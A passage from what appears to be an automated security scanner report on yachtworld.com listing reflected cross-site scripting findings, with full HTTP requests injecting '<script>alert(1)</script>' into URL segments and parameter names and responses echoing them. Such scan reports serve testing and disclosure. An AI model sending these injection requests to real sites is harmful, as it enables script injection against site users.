Date: Thu, 27 Jan 2011 20:04:59 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Fri, 14 Jan 2011 16:46:52 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2267348%5B%25%5D32%27+Regulator+32FS+with+Trailer%5B%25%5DUSD%26nbsp%3B139%2C900%5B%25%5DQuincy%2C+MA%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F7%2F3%2F2267348_1_mini.jpg%3F1285440379000%5B%25%5D%2Fboats%2F2006%2FRegulator-32FS-with-Trailer-2267348%2FQuincy%2FMA%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:04:59 GMT
Set-Cookie: VIEWED_BOATS_STORE=2267348%5B%25%5D32%27+Regulator+32FS+with+Trailer%5B%25%5DUSD%26nbsp%3B139%2C900%5B%25%5DQuincy%2C+MA%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F7%2F3%2F2267348_1_mini.jpg%3F1285440379000%5B%25%5D%2Fboats%2F2006%2FRegulator-32FS-with-Trailer-2267348%2FQuincy%2FMA%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...
ow" href="/core/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=2267348&boat_id=2267348&back=/core/boats/2006/Regulator-32fs-With-Trailer-2267348/Quincy/MA/United-States70e00"><script>alert(1)</script>0de7dd69d71&boat_id=2267348">
...[SNIP]...

3.149. http://www.yachtworld.com/boats/2006/Regulator-32fs-With-Trailer-2267348/Quincy/MA/United-States [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2006/Regulator-32fs-With-Trailer-2267348/Quincy/MA/United-States

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b533e"><script>alert(1)</script>c6cc94712fa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2006/Regulator-32fs-With-Trailer-2267348/Quincy/MA/United-States?b533e"><script>alert(1)</script>c6cc94712fa=1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:02:54 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Fri, 14 Jan 2011 16:46:52 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2267348%5B%25%5D32%27+Regulator+32FS+with+Trailer%5B%25%5DUSD%26nbsp%3B139%2C900%5B%25%5DQuincy%2C+MA%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F7%2F3%2F2267348_1_mini.jpg%3F1285440379000%5B%25%5D%2Fboats%2F2006%2FRegulator-32FS-with-Trailer-2267348%2FQuincy%2FMA%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:02:54 GMT
Set-Cookie: VIEWED_BOATS_STORE=2267348%5B%25%5D32%27+Regulator+32FS+with+Trailer%5B%25%5DUSD%26nbsp%3B139%2C900%5B%25%5DQuincy%2C+MA%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F7%2F3%2F2267348_1_mini.jpg%3F1285440379000%5B%25%5D%2Fboats%2F2006%2FRegulator-32FS-with-Trailer-2267348%2FQuincy%2FMA%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...
<a rel="nofollow" href="/core/listing/photoGallery.jsp?slim=quick&currency=USD&b533e"><script>alert(1)</script>c6cc94712fa=1&units=Feet&seo=0&checked_boats=2267348&boat_id=2267348&back=/core/boats/2006/Regulator-32fs-With-Trailer-2267348/Quincy/MA/United-States&boat_id=2267348">
...[SNIP]...

3.150. http://www.yachtworld.com/boats/2007/Regulator-32-Cc-4-Stroke-250-Yamahas-2194614/Ocean-City/MD/United-States [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2007/Regulator-32-Cc-4-Stroke-250-Yamahas-2194614/Ocean-City/MD/United-States

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca626"><script>alert(1)</script>812d62bbd70 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2007/Regulator-32-Cc-4-Stroke-250-Yamahas-2194614/Ocean-Cityca626"><script>alert(1)</script>812d62bbd70/MD/United-States HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.4.10.1296155835; yw_locale2=en_US; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); savedLabel0=24-32%20ft%2Cregulator%2CUsed%2C2004; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; latestSavedSearches=0_; s_pers=%20s_nr%3D1296155975932%7C1298747975932%3B%20s_lv%3D1296155975933%7C1390763975933%3B%20s_lv_s%3DFirst%2520Visit%7C1296157775933%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dno%2520search%2520phrase%2520entered%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.4.10.1296155952; VIEWED_BOATS_STORE=2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:40:19 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Wed, 19 Jan 2011 16:33:04 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 19:40:18 GMT
Set-Cookie: VIEWED_BOATS_STORE=2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 31930

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...
follow" href="/core/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=2194614&boat_id=2194614&back=/core/boats/2007/Regulator-32-Cc-4-Stroke-250-Yamahas-2194614/Ocean-Cityca626"><script>alert(1)</script>812d62bbd70/MD/United-States&boat_id=2194614">
...[SNIP]...

3.151. http://www.yachtworld.com/boats/2007/Regulator-32-Cc-4-Stroke-250-Yamahas-2194614/Ocean-City/MD/United-States [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2007/Regulator-32-Cc-4-Stroke-250-Yamahas-2194614/Ocean-City/MD/United-States

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ce29"><script>alert(1)</script>37b663f625a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2007/Regulator-32-Cc-4-Stroke-250-Yamahas-2194614/Ocean-City/MD7ce29"><script>alert(1)</script>37b663f625a/United-States HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.4.10.1296155835; yw_locale2=en_US; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); savedLabel0=24-32%20ft%2Cregulator%2CUsed%2C2004; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; latestSavedSearches=0_; s_pers=%20s_nr%3D1296155975932%7C1298747975932%3B%20s_lv%3D1296155975933%7C1390763975933%3B%20s_lv_s%3DFirst%2520Visit%7C1296157775933%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dno%2520search%2520phrase%2520entered%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.4.10.1296155952; VIEWED_BOATS_STORE=2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:40:50 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Wed, 19 Jan 2011 16:33:04 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 19:40:49 GMT
